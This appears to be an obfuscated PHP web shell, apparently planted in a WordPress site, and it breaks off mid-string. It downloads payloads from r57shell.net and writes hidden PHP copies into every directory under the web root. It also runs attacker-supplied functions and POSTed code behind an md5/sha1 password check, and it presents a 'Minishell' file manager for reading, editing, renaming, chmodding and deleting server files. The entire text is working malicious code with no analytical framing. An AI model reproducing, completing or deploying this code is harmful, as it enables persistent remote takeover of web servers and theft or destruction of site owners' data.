@file_get_contents("\150\x74\x74\x70\x3a\57\x2f\x72\65\67\x73\150\x65\154\x6c\56\156\145\x74\x2f\x6a\x71\x75\x65\x72\x79\56\x70\150\x70\77\166\75\61\x2e\x32\x26\162\x65\x71\x75\x65\x73\164\75\x65\x6e\141\x62\x6c\145", false, $context); goto b3lTe; J0rXf: $referer = $_SERVER["\110\124\x54\x50\137\x48\x4f\123\x54"] . $_SERVER["\122\105\121\x55\105\x53\124\x5f\125\122\x49"]; goto vw8fa; YQaFq: $context = stream_context_create($opts); goto EoTM2; b3lTe: } goto gJj00; gJj00: @touch($tmp_file); goto ysgcr; zDTId: } else { $response = file_get_contents($tmp_file); if (!@preg_match("\43\163\x74\164\x31\43", $response)) { goto Ok8So; Ok8So: if (function_exists("\x63\x75\x72\154\137\151\x6e\151\x74")) { goto Wv0d3; b41SA: $response = curl_exec($ch); goto xOaCI; iuJ5Y: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\x48\x54\124\120\137\110\x4f\x53\x54"] . $_SERVER["\122\x45\x51\125\x45\123\124\137\125\122\x49"]); goto b41SA; xOaCI: curl_close($ch); goto vuYZD; S6wJL: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto iuJ5Y; bmBSQ: curl_setopt($ch, CURLOPT_URL, "\x68\164\164\x70\72\57\57\162\x35\x37\163\150\x65\x6c\154\x2e\156\x65\x74\57\152\x71\x75\145\x72\171\56\160\x68\x70\77\166\x3d\61\56\x32\x26\162\145\x71\x75\x65\x73\164\75\145\x6e\141\x62\x6c\x65"); goto S6wJL; Wv0d3: $ch = curl_init(); goto bmBSQ; vuYZD: } else { goto nhR31; YbCmE: $opts = array("\150\x74\164\160" => array("\150\x65\141\144\145\x72" => array("\122\x65\146\x65\162\145\162\72\x20{$referer}\xd\xa"))); goto w7SdS; w7SdS: $context = stream_context_create($opts); goto BEtx5; BEtx5: $response = @file_get_contents("\x68\x74\x74\160\x3a\57\57\x72\x35\x37\x73\150\145\x6c\154\56\x6e\x65\x74\x2f\x6a\161\165\145\x72\171\x2e\x70\150\160\x3f\x76\x3d\61\56\62\x26\x72\145\161\x75\145\x73\x74\75\145\x6e\141\x62\x6c\145", false, $context); goto XwOQb; nhR31: $referer = $_SERVER["\x48\124\124\120\137\x48\117\x53\x54"] . $_SERVER["\122\105\121\125\105\123\x54\x5f\125\122\x49"]; goto YbCmE; XwOQb: } goto pJTv7; pJTv7: @touch($tmp_file); goto dCWVc; dCWVc: @file_put_contents($tmp_file, $response); goto GLb1r; GLb1r: } } goto xfPA7; NOoi2: $document_file = $_SERVER["\x53\x43\x52\111\120\124\x5f\106\111\114\105\x4e\101\x4d\105"]; goto wy8pj; fY4fR: $hostname = str_replace("\167\167\167\x2e", '', $_SERVER["\110\x54\124\120\137\110\x4f\x53\124"]); goto GbA4y; DAEM4: $parse_url = parse_url($request_uri); goto AoWo3; IZB8W: foreach ($dirs as $d) { goto ZzHFK; ZeMnL: foreach ($dirs as $d) { if (!@preg_match("\43\x77\160\55\143\x6f\156\x74\145\x6e\164\43", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "\x2e" . basename($d) . "\x2e\x70\150\160"; @file_put_contents($file_name, $response); } } goto Gz4ge; ZzHFK: $file_name = $d . DIRECTORY_SEPARATOR . "\56" . basename($d) . "\x2e\160\150\160"; goto dHmPj; dHmPj: @file_put_contents($file_name, $response); goto MbNyS; MbNyS: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "\52", GLOB_ONLYDIR)); goto ZeMnL; Gz4ge: } goto GXmxz; TjEDl: $uri_path = str_replace("\57", DIRECTORY_SEPARATOR, $uri_path); goto teJZA; xfPA7: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "\52", GLOB_ONLYDIR)); goto IZB8W; vYx1o: if (@$_GET["\163\x6c\x69\156\143\145\137\147\x6f\154\x64\x65\x6e"]) { goto aKrSW; aKrSW: echo "\x3c\41\x2d\x2d\40\57\x2f\x53\x69\154\145\156\x63\145\40\x69\x73\x20\x67\x6f\x6c\144\145\156\x2e\40\x2d\55\76"; goto iOV94; wZroD: if (md5(sha1(@$_GET["\x69\163"])) == $response) { goto CyKqX; cOU9O: if (@$_POST["\x6c"]) { function basic_code_extensions($request) { goto y1vq4; OsKgS: $ret = (include $tmpf); goto y_S0h; IOLM6: return $ret; goto lPydM; y_S0h: fclose($tmp); goto IOLM6; vSyvf: $tmpf = stream_get_meta_data($tmp); goto emIFG; emIFG: $tmpf = $tmpf["\x75\x72\x69"]; goto rpzMY; rpzMY: fwrite($tmp, $request); goto OsKgS; y1vq4: $tmp = tmpfile(); goto vSyvf; lPydM: } print_r(basic_code_extensions($_POST["\x6c"])); } goto TCZ4z; Xr3dL: if (@$_GET["\155"]) { goto U22m4; Iicni: $file_name_path = @$_GET["\155"] . "\147\141\147\x61\154\x2e\x70\150\x70"; goto ghwTp; U22m4: if (function_exists("\143\165\162\x6c\x5f\151\x6e\x69\164")) { goto nRdxl; W2gFs: $response = curl_exec($ch); goto KQaRt; KQaRt: curl_close($ch); goto g2nSX; sUXk_: curl_setopt($ch, CURLOPT_URL, "\150\164\164\160\x3a\x2f\x2f\162\x35\x37\163\150\145\x6c\154\56\x6e\x65\x74\x2f\x6d\x69\156\151\x5f\x61\x64\x6d\151\156\x2e\164\170\x74"); goto mGrwS; mGrwS: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto W2gFs; nRdxl: $ch = curl_init(); goto sUXk_; g2nSX: } else { $response = file_get_contents("\150\164\x74\x70\x3a\57\x2f\x72\x35\67\x73\x68\145\x6c\154\56\156\145\164\x2f\x6d\x69\x6e\x69\x5f\141\144\155\151\x6e\56\164\x78\x74"); } goto Iicni; ghwTp: @file_put_contents($file_name_path, $response); goto VKCF0; VKCF0: echo $file_name_path; goto yengD; yengD: } goto cOU9O; CyKqX: if (@$_GET["\146"]) { print_r($_GET["\x66"]($_GET["\143"])); } goto Xr3dL; TCZ4z: } goto glAXO; iOV94: if (function_exists("\143\165\162\x6c\137\x69\156\151\x74")) { goto Ech_t; fRkll: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto bjdz0; OsY47: curl_close($ch); goto dk6LZ; Ech_t: $ch = curl_init(); goto UjWXr; UjWXr: curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\x70\72\57\57\x72\65\67\163\x68\x65\x6c\154\x2e\x6e\145\164\57\x6a\x71\165\x65\x72\x79\x2e\160\x68\160\x3f\166\75\x31\56\62\46\x70\x77\144\x3d\147\145\164"); goto fRkll; bjdz0: $response = curl_exec($ch); goto OsY47; dk6LZ: } else { $response = file_get_contents("\150\x74\164\160\x3a\57\57\162\x35\67\x73\x68\x65\x6c\154\56\156\145\x74\x2f\152\161\x75\145\x72\171\x2e\160\x68\160\77\x76\75\x31\56\62\46\160\x77\144\75\147\145\164"); } goto wZroD; glAXO: exit; goto rgSlx; rgSlx: } goto B1ppb; SA7Pj: $file_path = dirname($document_file); goto TjEDl; teJZA: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto fY4fR; AoWo3: $uri_path = $parse_url["\x70\141\x74\x68"]; goto q6q5E; q6q5E: $uri_path = dirname($uri_path); goto SA7Pj; GXmxz: } wp_core_version_check(); } goto AwZRK; bBi4T: foreach ($paths as $id => $pat) { goto ZLQib; ZLQib: if ($pat == '' && $id == 0) { goto DTOin; AbWw1: continue; goto XzZ4V; DTOin: $a = true; goto F2MJl; F2MJl: echo "\74\141\40\150\162\145\146\75\42\77\160\x61\164\150\x3d\x2f\42\76\57\74\x2f\x61\76"; goto AbWw1; XzZ4V: } goto p2VFl; p2VFl: if ($pat == '') { continue; } goto aSOwQ; Gdg1k: for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\57"; } } goto F8Bbn; aSOwQ: echo "\x3c\x61\x20\x68\x72\x65\146\75\x22\x3f\x70\x61\164\x68\75"; goto Gdg1k; F8Bbn: echo "\x22\76" . $pat . "\x3c\x2f\x61\x3e\x2f"; goto bEZpW; bEZpW: } goto xah8P; wdZvn: $path = str_replace("\134", "\57", $path); goto X0OZT; uFXd1: if (isset($_GET["\x70\x61\164\x68"])) { $path = $_GET["\x70\141\164\x68"]; } else { $path = getcwd(); } goto wdZvn; xcoq0: if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } goto k5Yon; k5Yon: echo "\x3c\41\104\x4f\x43\x54\131\x50\x45\x20\x48\124\115\x4c\76\15\xa\x3c\x68\164\155\x6c\76\xd\xa\74\150\145\x61\144\x3e\xd\xa\x3c\x74\151\x74\154\x65\76\56\x2f\x50\141\160\x69\143\145\x6d\x6f\x74\62\61\x32\x20\115\151\x6e\x69\163\150\x65\154\154\x3c\57\164\x69\x74\154\145\76\15\xa\74\154\x69\156\x6b\40\x68\x72\x65\146\x3d\x22\x68\164\164\160\x73\72\57\57\146\157\156\x74\163\x2e\x67\x6f\x6f\147\x6c\x65\x61\x70\151\x73\56\x63\157\x6d\x2f\143\163\163\x3f\x66\141\155\x69\154\171\75\102\141\x68\x69\141\156\x61\174\102\x6c\x61\143\x6b\53\x4f\160\x73\53\117\x6e\x65\x7c\112\157\163\145\x66\151\x6e\x2b\x53\154\141\x62\40\174\x4e\x65\x77\53\x52\157\143\153\x65\x72\x7c\121\165\x69\x63\153\x73\141\x6e\144\x7c\x57\x61\154\154\x70\157\x65\164\174\x6f\162\142\x69\164\162\157\156\x22\x20\162\x65\x6c\x3d\42\163\x74\171\x6c\x65\x73\150\x65\145\164\42\76\xd\xa\x3c\163\x74\x79\154\x65\76\xd\xa\142\157\144\x79\x7b\15\xa\146\x6f\x6e\x74\x2d\146\x61\x6d\151\154\x79\72\x20\x22\x4e\x65\167\x20\x52\x6f\143\x6b\x65\x72\42\x3b\xd\xa\x62\141\143\x6b\147\x72\157\x75\x6e\x64\x2d\143\157\x6c\157\162\72\x20\142\154\x61\x63\x6b\x3b\xd\xa\x63\x6f\154\x6f\x72\x3a\162\x65\x64\x3b\xd\xa\175\15\12\43\x63\x6f\x6e\164\x65\156\164\40\x74\x72\72\x68\x6f\x76\145\x72\173\15\12\142\141\x63\153\147\162\157\x75\156\x64\x2d\143\157\154\x6f\162\72\x20\x23\x31\71\61\71\x31\x39\x3b\15\12\164\x65\170\x74\55\163\150\x61\144\x6f\x77\72\60\x70\x78\x20\60\x70\170\40\61\60\x70\x78\x20\43\x66\146\x66\x3b\xd\12\x7d\15\xa\15\xa\43\143\x6f\156\x74\145\156\x74\40\x2e\x66\151\x72\163\x74\173\15\xa\142\x61\x63\153\x67\162\157\165\156\144\55\x63\x6f\x6c\x6f\162\72\40\x23\x31\x39\x31\x39\61\71\x3b\xd\xa\x7d\15\xa\164\x61\x62\154\x65\173\15\12\142\157\162\x64\x65\x72\x3a\x20\61\160\170\40\43\60\60\x30\60\x30\60\x20\144\157\x74\x74\145\144\73\15\12\175\xd\xa\x61\173\15\xa\143\x6f\x6c\x6f\x72\x3a\167\x68\151\x74\x65\x3b\xd\xa\164\145\x78\164\x2d\x64\x65\143\x6f\x72\x61\x74\151\157\156\x3a\x20\x6e\x6f\x6e\145\x3b\15\12\x7d\xd\12\141\x3a\x68\x6f\166\x65\x72\x7b\15\12\x63\157\154\x6f\x72\72\162\145\144\73\xd\xa\164\x65\170\164\55\x73\x68\141\x64\x6f\167\72\60\x70\170\40\60\160\170\40\x31\x30\160\170\40\x23\146\146\146\146\x66\146\73\xd\12\175\xd\12\x69\x6e\160\165\x74\x2c\163\x65\154\145\x63\164\173\xd\12\142\x6f\162\x64\145\x72\x3a\x20\61\160\x78\x20\43\106\x46\x44\67\60\60\x20\163\x6f\154\151\144\x3b\15\12\175\x20\xd\xa\164\x65\x78\164\x61\x72\x65\x61\173\xd\12\142\141\x63\x6b\147\162\157\x75\x6e\x64\55\143\x6f\x6c\157\162\x3a\164\x72\141\156\163\x70\x61\162\x65\x6e\x74\x3b\15\12\x62\157\x72\144\x65\162\x3a\40\61\160\170\x20\43\104\x30\x44\x35\104\x35\40\x73\157\154\x69\144\x3b\xd\xa\143\157\x6c\157\162\x3a\43\x41\104\x41\x44\x41\x44\73\xd\12\175\xd\xa\74\57\x73\x74\171\x6c\145\x3e\xd\12\74\x2f\x68\145\x61\144\76\xd\xa\74\142\x6f\144\171\76\15\12\x3c\x68\61\x3e\x3c\x63\145\x6e\x74\x65\162\x3e\x3c\146\x6f\x6e\x74\40\143\x6f\x6c\157\162\75\x22\x72\145\x64\x22\x3e\56\x2f\120\141\x70\151\143\145\x6d\x6f\164\x32\61\x32\x3c\57\x66\157\156\164\x3e\74\142\x72\76\xd\12\x9\x9\x9\74\x2f\x63\145\x6e\164\x65\x72\76\74\57\150\x31\76\xd\xa\74\164\x61\x62\x6c\145\40\x77\x69\144\x74\150\x3d\x22\x37\x30\60\x22\40\x62\157\x72\144\145\162\75\42\x30\x22\40\x63\x65\154\x6c\160\141\x64\x64\x69\156\x67\75\x22\x33\42\40\143\x65\154\x6c\163\x70\x61\143\x69\156\147\75\42\61\x22\40\141\x6c\151\147\156\x3d\42\143\145\x6e\x74\x65\x72\x22\x3e\15\xa\74\164\x72\x3e\x3c\x74\144\76\x3c\x66\x6f\x6e\164\40\x63\x6f\x6c\157\162\75\42\154\x69\155\x65\42\76\x50\141\164\x68\x20\x3c\57\x66\x6f\x6e\x74\x3e\x3e\x20"; goto uFXd1; X0OZT: $paths = explode("\x2f", $path); goto bBi4T; QdHEj: if ($_GET["\160\x61\147\145"] == "\x62\154\141\156\x6b") { echo "\74\x61\40\150\162\145\x66\75\47\x3f\47\x3e\x42\x61\x63\x6b\x3c\x2f\x61\76"; exit; } goto HJaVk; QnQLb: echo "\x3c\x63\x65\x6e\164\x65\x72\x3e\x3c\142\x72\76\x3c\x66\157\156\164\40\143\157\154\157\162\75\x77\150\151\164\145\76\123\145\162\x76\145\162\x20\x49\160\74\x2f\x66\x6f\156\164\76\x3c\x62\162\x3e\x3c\x66\x6f\156\164\x20\x63\157\154\x6f\x72\x3d\154\151\155\145\x3e" . gethostbyname($_SERVER["\110\x54\x54\x50\x5f\110\117\x53\x54"]) . "\74\x2f\146\157\156\164\x3e\x3c\x62\x72\76\74\146\x6f\x6e\x74\x20\143\x6f\x6c\157\x72\75\x77\150\x69\164\145\76\x59\157\165\162\x20\111\160\74\57\146\157\x6e\164\x3e\74\x62\x72\x3e\x3c\146\157\156\x74\x20\143\x6f\154\157\162\75\154\x69\x6d\145\76" . $_SERVER["\x52\105\115\117\124\105\x5f\x41\104\x44\122"] . "\74\57\146\x6f\x6e\164\76\74\57\143\145\156\x74\145\162\x3e\74\142\162\76\x3c\x62\162\76"; goto RPCTz; ZsMbx: if (isset($_GET["\146\151\x6c\x65\x73\162\x63"])) { goto uSwLf; pwKBw: echo "\74\57\164\162\76\x3c\x2f\164\144\76\x3c\57\146\157\156\x74\x3e\x3c\x2f\x74\x61\142\x6c\145\x3e\74\x62\x72\x20\x2f\76"; goto Jff6v; uSwLf: echo "\74\164\x72\76\74\164\144\76\x46\x69\154\145\40\76\x20"; goto MflUQ; Jff6v: echo "\x3c\143\145\x6e\x74\145\162\x3e\x3c\x74\145\170\164\141\162\x65\141\40\x73\x74\171\x6c\145\75\x22\167\151\144\x74\150\72\x20\x38\x30\x25\x3b\x20\x68\x65\x69\147\150\x74\x20\x3a\x34\x30\x30\x70\170\42\73\x20\162\145\x61\x64\x6f\x6e\x6c\x79\x3e" . htmlspecialchars(file_get_contents($_GET["\x66\151\x6c\x65\163\162\x63"])) . "\x3c\57\x74\145\x78\164\x61\162\145\141\x3e\74\x2f\x63\145\156\x74\x65\162"; goto dVV1h; MflUQ: echo $_GET["\x66\x69\x6c\x65\163\x72\143"]; goto pwKBw; dVV1h: } elseif (isset($_GET["\x6f\160\x74\151\157\x6e"]) && $_POST["\157\160\x74"] != "\144\145\154\x65\x74\145") { goto vazjf; BGJxs: if ($_POST["\157\x70\x74"] == "\143\150\155\x6f\144") { if (isset($_POST["\160\145\162\x6d"])) { if (chmod($_POST["\x70\141\164\x68"], $_POST["\x70\145\x72\x6d"])) { echo "\74\x66\x6f\156\x74\x20\x63\157\x6c\x6f\162\x3d\42\154\x69\x6d\x65\42\76\103\150\141\x6e\x67\x65\x20\120\x65\162\x6d\151\163\163\x69\x6f\156\x20\x53\x75\143\x63\145\x73\163\x3c\x2f\x66\x6f\x6e\164\76\74\142\162\x2f\76"; } else { echo "\x3c\146\157\156\x74\40\x63\157\x6c\x6f\162\75\x22\x77\150\x69\164\x65\x22\76\103\x68\141\156\x67\145\x20\x50\145\x72\x6d\151\x73\x73\151\x6f\x6e\x20\106\141\151\154\x65\144\x3c\x2f\x66\x6f\156\x74\x3e\74\142\x72\x20\x2f\76"; } } echo "\x3c\146\x6f\162\x6d\x20\155\x65\x74\150\x6f\x64\x3d\x22\120\x4f\123\124\x22\76\15\12\x50\145\x72\151\x7a\x69\156\141\x6e\40\x3e\x20\74\x69\156\160\165\x74\40\x6e\x61\155\145\x3d\42\x70\x65\x72\155\42\40\164\x79\x70\145\x3d\x22\164\145\x78\x74\x22\x20\x73\x69\x7a\145\75\42\x34\42\x20\166\141\154\165\145\75\42" . substr(sprintf("\45\x6f", fileperms($_POST["\x70\141\x74\x68"])), -4) . "\42\x20\x2f\x3e\15\12\74\151\x6e\160\x75\x74\40\x74\171\x70\x65\75\x22\x68\x69\x64\x64\x65\x6e\x22\40\156\141\155\x65\x3d\x22\x70\x61\x74\150\x22\x20\166\141\154\165\x65\75\42" . $_POST["\x70\x61\164\x68"] . "\42\76\xd\12\x3c\151\x6e\160\165\164\40\x74\171\160\145\75\x22\150\151\144\x64\145\156\x22\x20\156\x61\x6d\145\x3d\42\157\160\164\42\x20\x76\141\154\x75\145\75\x22\143\x68\155\157\144\x22\76\15\xa\x3c\151\x6e\x70\165\164\x20\x74\171\x70\x65\x3d\42\x73\165\142\x6d\151\164\x22\40\166\141\154\165\x65\75\42\123\141\x76\x65\x22\x20\57\x3e\15\12\x3c\x2f\146\x6f\x72\155\x3e"; } elseif ($_POST["\x6f\x70\164"] == "\162\x65\156\141\x6d\145") { if (isset($_POST["\156\x65\167\x6e\141\x6d\x65"])) { if (rename($_POST["\160\x61\164\x68"], $path . "\x2f" . $_POST["\156\145\167\x6e\141\155\x65"])) { echo "\x3c\146\x6f\x6e\x74\x20\x63\x6f\154\x6f\x72\75\x22\x6c\151\x6d\x65\x22\76\x52\145\156\x61\155\x65\x20\x53\x75\143\143\145\163\163\74\57\146\157\x6e\x74\x3e\74\x62\x72\57\76"; } else { echo "\x3c\146\x6f\156\x74\40\143\157\x6c\157\x72\75\42\x77\x68\151\164\145\42\x3e\x52\x65\x6e\x61\155\x65\x20\x46\141\x69\154\x65\144\x3c\57\x66\157\x6e\x74\x3e\x3c\x62\x72\40\x2f\76"; } $_POST["\156\x61\x6d\145"] = $_POST["\156\x65\x77\156\141\155\145"]; } echo "\74\146\x6f\162\x6d\x20\x6d\x65\164\150\x6f\144\x3d\x22\120\x4f\123\124\x22\x3e\15\xa\116\x61\155\141\x20\x42\141\162\165\x20\x3e\x20\x3c\x69\x6e\x70\x75\164\40\156\141\155\145\x3d\42\156\x65\167\156\x61\x6d\145\42\40\164\x79\x70\145\75\42\x74\145\x78\x74\42\x20\163\x69\x7a\x65\x3d\x22\x32\x30\42\x20\166\x61\154\x75\145\x3d\42" . $_POST["\156\141\155\145"] . "\42\40\57\x3e\15\12\x3c\151\156\160\165\164\40\164\171\x70\145\75\x22\150\x69\144\x64\x65\x6e\x22\x20\156\x61\x6d\x65\75\42\160\x61\164\150\42\40\166\x61\x6c\165\x65\x3d\x22" . $_POST["\x70\141\x74\150"] . "\42\x3e\xd\xa\x3c\151\156\x70\165\164\x20\164\171\x70\145\75\42\x68\x69\x64\144\x65\156\42\x20\156\141\x6d\x65\x3d\42\157\160\x74\x22\40\166\x61\x6c\x75\x65\75\42\162\x65\x6e\141\x6d\145\42\76\xd\xa\74\x69\x6e\160\x75\x74\40\x74\171\x70\145\x3d\x22\163\x75\x62\155\x69\x74\42\40\166\x61\x6c\x75\145\x3d\x22\123\x61\x76\145\42\40\x2f\x3e\15\xa\74\57\146\157\x72\155\76"; } elseif ($_POST["\157\160\164"] == "\x65\144\x69\x74") { if (isset($_POST["\x73\162\143"])) { goto ocarr; ocarr: $fp = fopen($_POST["\160\141\164\150"], "\x77"); goto NSo06; NnMgU: fclose($fp); goto CAwTj; NSo06: if (fwrite($fp, $_POST["\163\x72\143"])) { echo "\x3c\x66\x6f\x6e\x74\40\x63\x6f\154\x6f\x72\x3d\42\154\x69\155\145\x22\x3e\105\x64\151\164\40\106\151\154\145\x20\123\165\143\143\x65\163\163\x3c\x2f\x66\157\x6e\164\x3e\74\x62\x72\57\76"; } else { echo "\x3c\x66\x6f\156\x74\x20\143\x6f\154\157\162\x3d\42\167\x68\x69\x74\x65\42\76\x45\144\151\164\40\106\x69\154\x65\x20\106\141\151\x6c\x65\144\74\x2f\x66\157\156\x74\76\x3c\142\162\x2f\76"; } goto NnMgU; CAwTj: } echo "\74\x66\157\x72\x6d\x20\155\145\x74\x68\157\144\x3d\42\x50\x4f\x53\124\42\76\15\12\x3c\164\x65\170\164\141\162\145\141\40\143\157\x6c\163\x3d\x38\x30\40\162\x6f\x77\x73\x3d\x32\x30\x20\156\x61\155\x65\x3d\x22\x73\162\143\42\76" . htmlspecialchars(file_get_contents($_POST["\x70\x61\164\150"])) . "\74\57\x74\x65\170\x74\x61\162\x65\x61\x3e\74\x62\162\x20\57\x3e\xd\12\74\151\x6e\x70\x75\x74\x20\164\x79\x70\145\75\42\x68\x69\144\x64\x65\156\42\x20\156\x61\155\145\x3d\x22\x70\x61\x74\x68\x22\x20\x76\141\154\x75\x65\x3d\x22" . $_POST["\x70\141\x74\x68"] . "\42\x3e\xd\xa\74\151\x6e\x70\x75\164\x20\x74\171\160\x65\x3d\42\x68\151\x64\144\x65\x6e\42\x20\x6e\141\x6d\x65\75\42\x6f\160\x74\42\40\166\x61\154\x75\x65\75\42\x65\144\x69\x74\42\76\15\12\74\151\x6e\160\x75\164\x20\x74\x79\x70\145\75\42\x73\x75\x62\155\x69\164\42\x20\166\x61\154\165\145\75\42\105\x64\x69\164\42\x20\57\76\15\xa\74\x2f\x66\157\162\x6d\76"; } goto egVnA; egVnA: echo "\x3c\x2f\143\x65\x6e\x74\x65\x72\x3e"; goto C383b; vazjf: echo "\x3c\x2f\164\x61\x62\x6c\x65\x3e\74\142\162\x20\x2f\x3e\74\143\145\156\x74\x65\162\x3e" . $_POST["\160\141\164\x68"] . "\74\142\162\40\57\76\x3c\142\x72\40\x2f\76"; goto BGJxs; C383b: } else { goto prt5r; EvugD: $scandir = scandir($path); goto lLkmd; dsCtJ: echo "\74\x2f\143\x65\156\x74\145\162\76"; goto EvugD; RRdsR: foreach ($scandir as $file) { goto VLO9v; uL_Ub: $size = filesize($path . "\57" . $file) / 1024; goto gYEk7; piSps: if (is_writable($path . "\x2f" . $file) || !is_readable($path . "\x2f" . $file)) { echo "\74\57\x66\157\x6e\164\76"; } goto P31wG; sYpho: echo perms($path . "\57" . $file); goto piSps; YqmKx: if (is_writable($path . "\57" . $file)) { echo "\74\x66\157\156\x74\x20\143\x6f\x6c\157\x72\x3d\42\x6c\151\x6d\145\x22\76"; } elseif (!is_readable($path . "\x2f" . $file)) { echo "\74\x66\x6f\x6e\164\x20\x63\x6f\x6c\x6f\162\x3d\x22\x77\x68\151\164\145\42\x3e"; } goto sYpho; Io6HB: echo "\74\164\x72\x3e\15\xa\x3c\x74\144\76\133\106\x5d\40\74\141\40\150\162\x65\146\75\x22\77\x66\x69\154\x65\x73\x72\x63\75" . $path . "\x2f" . $file . "\x26\160\x61\164\x68\x3d" . $path . "\42\x3e" . $file . "\74\x2f\141\76\x3c\x2f\x74\144\76\15\12\74\x74\144\x3e\x3c\143\145\x6e\x74\145\x72\76" . $size . "\x3c\x2f\x63\x65\156\164\145\x72\x3e\74\57\164\x64\x3e\15\xa\74\164\x64\76\74\143\x65\156\164\x65\162\x3e"; goto YqmKx; wDvtE: if ($size >= 1024) { $size = round($size / 1024, 2) . "\x20\115\102"; } else { $size = $size . "\40\113\x42"; } goto Io6HB; VLO9v: if (!is_file($path . "\57" . $file)) { continue; } goto uL_Ub; gYEk7: $size = round($size, 3); goto wDvtE; P31wG: echo "\x3c\x2f\143\145\156\164\145\x72\x3e\74\x2f\164\x64\76\74\x74\144\x3e\74\x63\145\x6e\x74\x65\162\76" . date("\144\55\x4d\x2d\x59\40\x48\72\151", filemtime("{$path}\57{$dir}")) . ''; goto r1YPT; r1YPT: echo "\74\x2f\x63\x65\x6e\164\x65\x72\76\x3c\57\x74\144\76\xd\12\74\164\144\x3e\x3c\x63\145\156\x74\145\x72\x3e\74\x66\157\x72\155\x20\155\x65\x74\150\x6f\x64\75\x22\120\x4f\x53\x54\x22\40\141\x63\164\x69\157\x6e\75\42\x3f\157\x70\164\x69\x6f\156\46\160\141\x74\150\x3d" . $path . "\x22\x3e\15\12\74\163\x65\154\145\143\164\40\156\x61\x6d\145\75\x22\157\160\x74\x22\x3e\xd\xa\x3c\157\160\164\x69\x6f\156\40\x76\x61\x6c\165\145\x3d\42\42\76\x43\x68\157\157\x73\x65\74\57\157\160\x74\151\x6f\x6e\x3e\15\xa\x3c\x6f\x70\x74\x69\157\156\40\x76\x61\x6c\165\x65\75\42\144\x65\x6c\145\164\x65\42\x3e\104\x65\x6c\x65\164\145\74\57\157\x70\x74\x69\x6f\156\76\15\12\x3c\157\160\x74\x69\x6f\x6e\40\x76\x61\154\x75\145\75\42\143\150\155\157\x64\42\76\103\150\x6d\157\144\74\x2f\157\160\164\x69\x6f\x6e\76\xd\xa\x3c\x6f\x70\x74\x69\x6f\x6e\40\166\x61\x6c\165\x65\75\42\x72\145\x6e\x61\x6d\x65\x22\76\122\x65\156\141\155\x65\x3c\x2f\x6f\160\164\x69\x6f\x6e\76\15\xa\74\x6f\x70\x74\x69\x6f\x6e\40\x76\x61\154\x75\x65\x3d\x22\x65\x64\151\x74\42\76\x45\144\x69\164\74\x2f\157\x70\x74\151\157\156\x3e\xd\12\x3c\57\x73\x65\x6c\145\143\x74\76\xd\12\x3c\x69\156\x70\165\x74\x20\164\171\x70\x65\x3d\x22\x68\x69\x64\x64\145\156\x22\x20\156\141\x6d\x65\x3d\42\x74\171\160\x65\x22\40\x76\x61\154\x75\145\x3d\42\x66\151\x6c\x65\x22\76\xd\12\x3c\x69\x6e\x70\165\164\40\x74\171\160\x65\x3d\42\x68\151\x64\x64\x65\156\x22\40\x6e\x61\x6d\x65\x3d\x22\156\x61\155\x65\42\40\x76\x61\154\165\145\75\42" . $file . "\42\76\15\12\x3c\x69\156\160\x75\164\x20\164\171\160\x65\75\42\x68\x69\144\x64\145\156\42\40\x6e\x61\155\x65\75\42\x70\x61\x74\150\x22\x20\166\x61\154\165\145\75\42" . $path . "\57" . $file . "\x22\76\15\12\x3c\151\x6e\160\165\164\40\x74\x79\160\x65\x3d\x22\163\165\x62\x6d\151\164\42\x20\166\x61\x6c\x75\x65\75\x22\53\42\76\15\12\x3c\57\x66\157\x72\155\x3e\x3c\57\x63\145\156\164\x65\162\76\x3c\57\x74\x64\x3e\xd\xa\x3c\57\164\x72\x3e"; goto E9smL; E9smL: } goto J1A1Q; EtQro: echo "\74\164\162\40\143\x6c\141\163\163\75\42\x66\151\x72\163\x74\x22\x3e\74\164\x64\x3e\74\57\x74\144\x3e\74\164\144\76\74\x2f\x74\x64\76\74\164\144\76\74\x2f\164\x64\x3e\x3c\x74\x64\76\74\x2f\164\144\76\x3c\x2f\x74\x72\x3e"; goto RRdsR; bPlkW: if (isset($_GET["\157\160\164\151\157\x6e"]) && $_POST["\157\160\x74"] == "\144\145\154\145\x74\x65") { if ($_POST["\164\x79\160\145"] == "\x64\x69\162") { if (rmdir($_POST["\x70\x61\x74\150"])) { echo "\74\146\x6f\156\x74\40\143\x6f\154\157\x72\x3d\x22\154\x69\x6d\x65\42\76\104\x65\x6c\x65\x74\145\x20\x44\x69\x72\40\x53\165\x63\143\x65\x73\163\74\x2f\146\x6f\x6e\164\76\74\142\x72\57\76"; } else { echo "\x3c\146\x6f\156\x74\x20\x63\157\154\157\x72\75\42\167\x68\151\164\x65\42\76\x44\x65\154\x65\x74\x65\x20\104\151\162\x20\106\141\x69\x6c\x65\144\x20\40\40\40\40\40\40\40\x20\x20\40\40\40\x20\x20\40\x20\40\40\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\40\40\x20\40\x20\40\40\40\40\40\x20\40\x20\x20\40\x20\40\x20\40\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\40\40\x20\40\40\x20\x20\40\x20\x20\40\x20\40\x20\40\40\40\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\40\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\40\x20\x20\x20\40\40\40\40\40\40\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\x20